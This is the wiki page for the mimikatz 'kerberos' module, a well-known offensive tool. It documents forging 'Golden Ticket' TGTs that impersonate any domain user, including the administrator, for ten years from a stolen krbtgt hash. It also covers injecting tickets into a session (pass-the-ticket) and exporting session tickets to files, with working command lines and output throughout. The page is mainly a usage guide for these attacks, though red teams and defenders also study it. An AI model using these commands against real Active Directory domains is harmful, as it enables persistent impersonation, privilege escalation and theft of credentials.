Skip to content

module ~ kerberos

Benjamin DELPY edited this page Apr 24, 2014 · 30 revisions

This module can be used without any privilege. It permits to play with official Microsoft Kerberos API - http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx - and to create offline 'Golden tickets', free, long duration TGT tickets for any users 😄

Lots of informations : [fr] http://1drv.ms/1fuEU28

Commands: golden, ptt, list, tgt, purge

golden

Willy Wonka's choice

This command create a long duration Kerberos ticket, a TGT for 10 years, for any user you want (eg: the domain administrator 😤).

Arguments:

  • /user - the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.
  • /domain - the fully qualified domain name (eg: chocolate.local).
  • /sid - the SID of the domain (eg: S-1-5-21-130452501-2365100805-3685010670).
  • /krbtgt - the NTLM hash of the krbtgt account (from NTDS.DIT or lsadump::samrpc /patch).
  • /id - optional - the id of the user - default is: 500 for the well-known Administrator.
  • /groups - optional - id of groups the user belongs (first is primary group) - default is: 513,512,520,518,519 for the well-known Administrator's groups.
  • /ticket - optional - filename for output the ticket - default is: ticket.kirbi.
mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
User      : utilisateur
Domain    : chocolate.local
SID       : S-1-5-21-130452501-2365100805-3685010670
User Id   : 1107
Groups Id : *513
krbtgt    : 310b643c5316c8c3c70a10cfb17e2e31
-> Ticket : utilisateur.chocolate.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Remarks:

  • password changing/smartcard usage does not invalidate Golden Ticket;
  • this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;
  • NTLM hash of krbtgt account is never changed automatically.

See also:

ptt

Pass-The-Ticket

Injects a Kerberos ticket in the current session (TGT or TGS).

Argument:

  • filename - the ticket's filename
mimikatz # kerberos::ptt [email protected]
Ticket '[email protected]' successfully submitted for current session

Remark: if used with tickets external to mimikatz, tickets must be in Kerberos credential format (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8

See also:

tgt

Displays informations about the TGT of the current session.

mimikatz # kerberos::tgt
Keberos TGT of current session :
           Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
           Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
           Target Name  (--) : @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key  (12) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
           Ticket  (00 - 12) : [...]
(NULL session key means allowtgtsessionkey is not set to 1)

Remark: If session key is filled with 00, then allowtgtsessionkey is not enabled - http://support.microsoft.com/kb/308339 - the session key will not be exported for TGT with kerberos::list /export unless you set it, it's not a problem with TGS.
sekurlsa::tickets /export works without this key because it reads raw memory.

list

Lists and export Kerberos tickets (TGT and TGS) of the current session.

Argument:

  • /export - optional - export all tickets to files
mimikatz # kerberos::list /export

[00000000] - 12
   Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
   Server Name       : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   * Saved to file     : 0-40e10000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi

[00000001] - 12
   Start/End/MaxRenew: 24/04/2014 15:13:03 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
   Server Name       : cifs/srvcharly.chocolate.local @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file     : 1-40a50000-Administrateur@cifs~srvcharly.chocolate.local-CHOCOLATE.LOCAL.kirbi

See also:

purge

Purges all tickets of the current session.

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK